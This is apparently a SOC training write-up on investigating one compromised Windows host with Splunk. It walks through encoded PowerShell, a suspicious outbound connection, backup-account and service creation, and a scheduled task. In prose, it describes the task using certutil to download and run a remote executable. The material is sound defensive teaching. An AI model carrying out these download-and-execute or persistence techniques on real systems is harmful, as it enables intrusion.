Splunk

Malicious Process Execution

Let’s consider a situation where you’ve received an alert about the execution of a suspicious encoded PowerShell command. You now need to analyse the activity. How would you use a SIEM in this case? Let’s try using a Splunk query to see what useful information we can find in the logs using Splunk SIEM. Let’s write a search that detects launched processes (EventCode=1) related to PowerShell that include the EncodedCommand PowerShell argument.

In this example, we detected that on host WINHOST05, a malicious update_config.js file was executed from the C:\Users\Public directory, which resulted in cmd.exe launching PowerShell with an encoded command. Note: The activities from the following examples will not be visible in your Splunk instance, it only contains logs for your practical tasks.

Suspicious Network Connection

This story didn’t end there, as just a few minutes later, we received another alert from WINHOST05, this time about a suspicious network connection. Let’s try to determine what happened using Sysmon logs. To do this, we will search for EventCode 3, which identifies network connections, and filter by the host WINHOST05, since that is where the activity originated.

As shown in the image below, a suspicious connection was initiated by the suspicious process PPn423.exe from the Temp folder, targeting the unusual port 9999 on IP address 83.222.191.2. We also recommend checking this IP on TI platforms.

User Creation

A SOC analyst started a new shift and was handed information about suspicious activity on a host. Within just a couple of hours, another alert came in from the same machine, this time about a user account creation. This suggests the attacker is still present on the host. We need to review the Security logs to detect what’s happening and share this information with our SOC L2 analyst.

The attacker likely decided to create a persistence mechanism in the form of a backup user account, which was created and enabled by ted-admin on the WINHOST05 host.

Service creation and Service start/stop events.

We will use two event codes, 7045 and 7036, which indicate service creation and service start/stop events.

From the search results, we can see that on the host, a service named "User Updates" was created and started, which launches the malicious RNSfnsjdf.exe file from the Temp directory under the SYSTEM account. This is most likely a privilege escalation attempt, as we recall that the attacker previously only had access to the ted-admin account.

Persistance Mechanisms

Scheduled Tasks

To start, we’ll query the task name AssessmentTaskOne along with event ID 4698, which indicates that a scheduled task was created. Since we also know the exact time of the activity, we can filter by timestamp to speed up the search. Note: For now, we won’t filter by host. This way, we can check whether the activity is isolated to a single machine or present across multiple hosts.

From our search, we can see that there’s only a single event related to this activity.

Now, let’s look at the Message field to understand what this task actually does. Let’s go step by step, starting with the Triggers section.

We can see that the task runs every day at the same time on a user workstation, which is quite unusual. Let’s continue by analysing the Message field, focusing on the Exec and Principals sections, to see what task is being executed and under which user account.

At this point, we can already see the first signs of malicious activity. This task will use certutil to download rv.exe from the tryhotme domain into the Temp folder under the name DataCollector.exe. It will then launch this file using a Start-Process PowerShell command. All of this activity will be executed under the user oliver.thompson. This is a clear example of persistence.